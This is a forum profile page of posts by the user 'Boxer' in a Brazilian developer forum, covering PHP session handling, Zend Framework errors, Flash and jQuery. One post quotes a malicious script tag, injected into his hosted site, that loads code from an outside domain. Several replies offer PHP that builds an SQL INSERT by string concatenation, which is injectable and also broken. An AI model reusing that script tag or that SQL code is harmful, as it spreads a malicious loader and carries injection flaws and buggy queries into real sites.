Jump to content


Boxer's Content

There have been 18 items by Boxer (Search limited from 05/06/2019)


Ordernar por                Order  

#1004911 Dúvidas Para Impressão.

Posted by Boxer on 26/10/2010, 13:11 in .NET

Olá, pessoal!

Seguinte... Estou iniciando (sei que um pouco tarde) em .Net...
Fiz alguns cursos, mas ainda não botei a mão na massa... Já fiz alguma coisinha ou outra, basicona mesmo...
Sempre programei em PHP e ASP clássico e o .Net é um tanto quanto diferente...

O que preciso é saber se consigo, através do .Net, imprimir informações de compra em uma impressora fiscal...
Sabe aquelas notinhas, quando a gente vai na padaria e eles imprimem? Então... São essas...

Seria com Crystal Report?
Dei uma lida sobre o Quickreport, mas este é para Delphi... Procede?

Desde já, agradeço e forte abraço!



#1004304 Dúvida Simples

Posted by Boxer on 07/10/2010, 13:03 in Adobe Flash e ActionScript

Buenas!

Tenho uma dúvida e não consegui encontrar algo relacionado na pesquisa.
Seguinte...

Estou tentando executar um tween variáveis com o nome de determinados mc´s, mas não tá rolando...
Por exemplo:

mcVar = "mcBola";
easingY(_root.mcVar,Back.easeInOut,_root.mcVar._y,80,15);

E não róla...
Mas, se eu fizer:

easingY(_root.mcBola,Back.easeInOut,_root.mcBola._y,80,15);

Aí ele funciona certinho...

Pq o anterior não funciona?

Valew, pessoal!

Abraços!

Pesquisando, eu mesmo descobri, pessoal!

A variável precisa ser definida como tipo MovieClip...

Então, fica assim:

var mcVar:MovieClip = new MovieClip();

mcVar = _root.mcBola;

easingY(mcVar,Back.easeInOut,mcVar._y,80,15);

Simples!

Abraços!



#1000596 [Resolvido] Borda Arredondada Com Jquery No Ie

Posted by Boxer on 21/06/2010, 17:26 in Frameworks e Plug-ins de Javascript

Boa noite,

estou usando jquery para arredondar as bordas das divs, mas estou tendo problemas com o internet explorer(pra variar).

Ele arredonda as bordas, mas depois de arredondar, fica um espaço branco no lugar que foi arredondado, nos outros browser, esse espaço branco some, mas no ie fica...

Alguém saberia a solução?

Grato.



Buenas!!!

Uuuuuuuuuuum mês depois!!! Mas sempre é bom pra quem precisar!!!

Se vc estiver usando o jcorner, pode fazer o seguinte:


$("[DIV_ou_estilo]").corner("#e8d89c(Cor de fundo do arredondamento em hexadecimal) 15px");


(y)



#1000017 Gravando Dados De Uma Session No Bd

Posted by Boxer on 04/06/2010, 18:21 in PHP

Verdade....

Tenta fazer o seguinte...

Esse será o novo restrito.php:


<?php         
    
    $conexao = mysql_connect("host", "username", "password")or die("Erro na conexão ao banco de dados.");    
    $db = mysql_select_db("database")or die("Erro ao selecionar a base de dados.");    
    if(!isset($_SESSION)){
        session_start();    
    }    
    if(!isset($_SESSION['UsuarioID'])OR($_SESSION['UsuarioNivel'] < $nivel_necessario)){
        session_destroy();
        $sql = "INSERT INTO usuario ('nome') VALUES ('".$_SESSION[UsuarioNome]."')";
        $sql = mysql_query($sql)or die("Houve erro na gravação dos dados.");    
    }

    echo "usuId: " . $_SESSION['UsuarioID'] . "   usuNivel: " . $_SESSION['UsuarioNivel'] . "  nivelNecessario: " . $nivel_necessario;
?>



Joga lá e vamos ver o q ele mostra...

[]´s



#1000015 Gravando Dados De Uma Session No Bd

Posted by Boxer on 04/06/2010, 18:01 in PHP

Nossa, cara...

Mas fica td branco?
Não dá nenhuma mensagem de erro?



#1000004 Iniciando Zend 1.0

Posted by Boxer on 04/06/2010, 15:59 in Frameworks e Software relacionado a PHP

Sim, sim... Reiniciei... E o problema persiste... :ponder:

Muito estranho...

Bom, caras....
As configurações, as vezes, nos presenteiam com surpresas...

Consegui resolver os problemas nas configurações do Zend...

Eis que reinstalei, nesses dias, o Wamp Server... Até aí, td ok...
Mas não havia desenvolvido nada em php até então...
Acabei esquecendo de ativar as Short Tags... Esse era um dos motivos que meu script não funcionava...

Além disso, o Wamp Server possui 2 arquivos PHP.INI.
Ativei o pdo_mysql em um deles... Mas o q o server usava era o outro...

Agora está dando um simples erro de foreach... MARAVILHA!!!!

Valeu André!

[]´s



#1000001 Gravando Dados De Uma Session No Bd

Posted by Boxer on 04/06/2010, 14:49 in PHP

Viiiiiixi...

Peraí...

Apaga td do Restrito.php e joga isso aqui:


<?php 
    
    $conexao = mysql_connect("host", "username", "password")or die("Erro na conexão ao banco de dados.");
    $db = mysql_select_db("database")or die("Erro ao selecionar a base de dados.");
    if(!isset($_SESSION)){
        session_start();
    }
    if(!isset($_SESSION['UsuarioID'])OR($_SESSION['UsuarioNivel'] < $nivel_necessario)){
        session_destroy();
        $sql = "INSERT INTO usuario ('nome') VALUES ('".$_SESSION[UsuarioNome]."')";
        echo $sql;
        //$sql = mysql_query($sql)or die("Houve erro na gravação dos dados.");
    }

?>


E executa o Restrito.php

[]´s



#999998 Iniciando Zend 1.0

Posted by Boxer on 04/06/2010, 14:33 in Frameworks e Software relacionado a PHP

Opa...

Bom.. A estrutura está assim:


application
    controllers
    models
    views
        filters
        helpers
        scripts
            index
library
    Zend
public
    images
    scripts
    styles


Trabalhei em algumas coisas e parece q houve uma evolução... Porém, tenho, agora, essa mensagem:


Fatal error: Uncaught exception 'Zend_Db_Adapter_Exception' with message 'The mysql driver is not currently installed' in C:\wamp\www\tutozend\library\Zend\Db\Adapter\Pdo\Abstract.php:112 Stack trace: #0 C:\wamp\www\tutozend\library\Zend\Db\Adapter\Pdo\Mysql.php(96): Zend_Db_Adapter_Pdo_Abstract->_connect() #1 C:\wamp\www\tutozend\library\Zend\Db\Adapter\Abstract.php(448): Zend_Db_Adapter_Pdo_Mysql->_connect() #2 C:\wamp\www\tutozend\library\Zend\Db\Adapter\Pdo\Abstract.php(238): Zend_Db_Adapter_Abstract->query('DESCRIBE `album...', Array) #3 C:\wamp\www\tutozend\library\Zend\Db\Adapter\Pdo\Mysql.php(156): Zend_Db_Adapter_Pdo_Abstract->query('DESCRIBE `album...') #4 C:\wamp\www\tutozend\library\Zend\Db\Table\Abstract.php(823): Zend_Db_Adapter_Pdo_Mysql->describeTable('album', NULL) #5 C:\wamp\www\tutozend\library\Zend\Db\Table\Abstract.php(862): Zend_Db_Table_Abstract->_setupMetadata() #6 C:\wamp\www\tutozend\library\Zend\Db\Table\Abstract.php(969): Zend_Db_Table_Abstract->_setupPrimaryKey() #7 C:\wamp\www\tutozend\librar in C:\wamp\www\tutozend\library\Zend\Db\Adapter\Pdo\Abstract.php on line 112


pdo_mysql habilitado no PHP.INI


[]´s



#999997 Gravando Dados De Uma Session No Bd

Posted by Boxer on 04/06/2010, 14:28 in PHP

Eita...

Tenta no IE...

[]´s



#999993 Gravando Dados De Uma Session No Bd

Posted by Boxer on 04/06/2010, 14:14 in PHP

Oops...

Comenta essa linha:


header("Location: restrito.php"); exit;


[]´s



#999988 Gravando Dados De Uma Session No Bd

Posted by Boxer on 04/06/2010, 12:41 in PHP

Tenta da um echo $sql e lê a query...

Manda a query aí, pra gente ver...

Copia a Query e executa no phpmyadmin...

[]´s



#999986 Iniciando Zend 1.0

Posted by Boxer on 04/06/2010, 12:07 in Frameworks e Software relacionado a PHP

Hey, brother!

Alterei para o Autoloader, mas permanece o mesmo erro.

(y)



#999984 Gravando Dados De Uma Session No Bd

Posted by Boxer on 04/06/2010, 11:57 in PHP

Buenos!

Ele chega a registrar algo no BD?

Tenta assim:


$sql = "INSERT INTO usuario ('nome') VALUES ('".$_SESSION[UsuarioNome]."')";


[]´s



#999977 Iniciando Zend 1.0

Posted by Boxer on 04/06/2010, 11:13 in Frameworks e Software relacionado a PHP

Buenos, pessoal!

Pois é.. Sexta-feira e trabalhando, assim como muitos!

Mas arrumei um tempinho pra estudar um pouco de Zend Framework!

Seguinte...
Estou com um tuto do Akrabat e parece ser bem legal, bem explicado...
Mas estou testando e não encontro a solução pra essa mensagem:


Fatal error: Uncaught exception 'Zend_Exception' with message 'File "Album.php" does not exist or class "Album" was not found in the file' in C:\wamp\www\tutozend\library\Zend\Loader.php:99 Stack trace: #0 C:\wamp\www\tutozend\application\controllers\IndexController.php(11): Zend_Loader::loadClass('Album') #1 C:\wamp\www\tutozend\library\Zend\Controller\Action.php(133): IndexController->init() #2 C:\wamp\www\tutozend\library\Zend\Controller\Dispatcher\Standard.php(268): Zend_Controller_Action->__construct(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http), Array) #3 C:\wamp\www\tutozend\library\Zend\Controller\Front.php(954): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http)) #4 C:\wamp\www\tutozend\index.php(34): Zend_Controller_Front->dispatch() #5 {main} thrown in C:\wamp\www\tutozend\library\Zend\Loader.php on line 99


O bootstrap (index.php) está assim:


<?php

	error_reporting(E_ALL|E_STRICT);
	setlocale (LC_ALL, 'pt_BR');
	date_default_timezone_set('America/Sao_Paulo');

	set_include_path('.' . PATH_SEPARATOR . './library'
	. PATH_SEPARATOR . './application/models/'
	. PATH_SEPARATOR . get_include_path());
	
	include "Zend/Loader.php";
	
	Zend_Loader::loadClass('Zend_Controller_Front');
	Zend_Loader::loadClass('Zend_Config_Ini');
	Zend_Loader::loadClass('Zend_Registry');
	Zend_Loader::loadClass('Zend_Db');
	Zend_Loader::loadClass('Zend_Db_Table');
	
	// Leitura da configuração
	$config = new Zend_Config_Ini('./application/config.ini','general');
	$registry = Zend_Registry::getInstance();
	$registry ->set('config',$config);
	
	// Configuração de Data Base
	$db = Zend_Db::factory($config->db->adapter , $config->db->config->toArray());
	Zend_Db_Table::setDefaultAdapter($db);

	// configurar o front controller para que ele saiba em qual diretório se encontra os nossos controllers
	$frontController = Zend_Controller_Front::getInstance();
	$frontController->throwExceptions(true);
	$frontController->setControllerDirectory('./application/controllers');
	
	// rodar!
	$frontController->dispatch();




Meu IndexController (indexController.php) está assim:


<?php

	class IndexController extends Zend_Controller_Action
	{

		function init()
		{
		
			$this->initView();
			$this->view->baseUrl = $this->_request->getBaseUrl();
			Zend_Loader::loadClass('Album');
		
		}

		function indexAction()
		{
		
			$this->view->title = "Meus Álbuns";
			$album = new Album();
			$this->view->$album->fetchAll();
			$this->render();
		
		}

		function addAction()
		{
		
			$this->view->title = "Adicionar álbum";
			$this->render();
		
		}

		function editAction()
		{
		
			$this->view->title = "Editar álbum";
			$this->render();
		
		}

		function deleteAction()
		{
		
			$this->view->title = "Excluir álbum";
			$this->render();
		
		}

	}


O caminho do arquivo Album é:

[raiz]\application\models\Album.php

E é composto por:


<?php

	class Album extends Zend_Db_Table{
	
		protected $_name = 'album';
	
	}


Alguém poderia me explicar o que não estou enxergando???

Valew, pessoal!

[]´s



#999755 Script Invasor Deconhecido

Posted by Boxer on 27/05/2010, 19:39 in PHP

Você está enviando por algum cliente de FTP? Já tentou enviar de outro PC?


Normalmente envio através do CoreFTP.

Mas já tentei enviar diretamente do CPanel.

Testei em 3 computadores diferentes. Em todos obtive os mesmos resultados.



#999746 Script Invasor Deconhecido

Posted by Boxer on 27/05/2010, 17:37 in PHP

Porque é quando ele está online que a pessoa pode explorar a vunerabilidade. Ou ainda pode ser algum código que o próprio servidor de hospedagem insere nas páginas, ele é gratuito? Já entrou em contato com o suporte?


Pois é, cara...
Não é hospedagem gratuita...
Tá no Hosted...

Sinceramente estou achando que o problema é do servidor, já que eu subo o arquivo, testo e o script já está lá.
Entrei em contato e eles disseram que o problema é da minha máquina. Mas eu subi o arquivo de outra máquina e não adiantou.

:ponder:



#999727 Script Invasor Deconhecido

Posted by Boxer on 27/05/2010, 14:50 in PHP

Talvez o seu site está com falhas em entradas de formulários... e permitiu que alguém inserisse este script... sem que vc soubesse...!

Aumentar a segurança do seu site vai ajudar a evitar essas coisas...!


Certo...
Mas pq, qdo eu baixo o arquivo, aquele script não está lá e, qdo eu subo, ele aparece?

Valew!

[]´s



#999721 Script Invasor Deconhecido

Posted by Boxer on 27/05/2010, 13:16 in PHP

Boa tarde, pessoal.

Estou com um problema um tanto quanto estranho.

No meu site, existe um script no código que eu não coloquei. Segue:

<script src=http://skream.jp/cms-delete/index.php ></script>

O estranho é que, quando baixo o arquivo, o script não está lá.
Quando rodo no localhost, ele não aparece na exibição do código fonte.
Mas, qdo subo o arquivo e rodo na hospedagem, o script está lá.

Já alterei senha de FTP, já tentei alterar de outros PCs, já tentei alterar diretamente no CPanel, mas nada!

Alguém já viu isso?

Valeu!

[]´s




IPB Skin By Virteq